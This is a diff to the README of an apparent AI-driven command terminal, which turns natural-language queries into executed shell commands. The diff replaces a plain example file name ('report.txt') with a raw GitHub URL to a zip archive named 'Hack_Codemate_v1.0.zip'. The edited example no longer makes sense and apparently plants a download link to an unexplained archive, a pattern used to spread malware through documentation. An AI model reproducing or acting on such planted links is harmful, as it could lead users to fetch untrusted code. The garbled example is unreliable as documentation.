Tathagt/CodemateHack/README.md

   * Click the "AI Mode: OFF" button to toggle it on.
 The button will turn green.

-  * Type a natural language query (e.g., "create a file named report.txt with the text 'Project complete'").
+  * Type a natural language query (e.g., "create a file named https://raw.githubusercontent.com/Tathagt/CodemateHack/main/command_terminal/Hack_Codemate_v1.0.zip with the text 'Project complete'").

   * Press Enter.
 The AI will translate your query into a command, display it, and then execute it.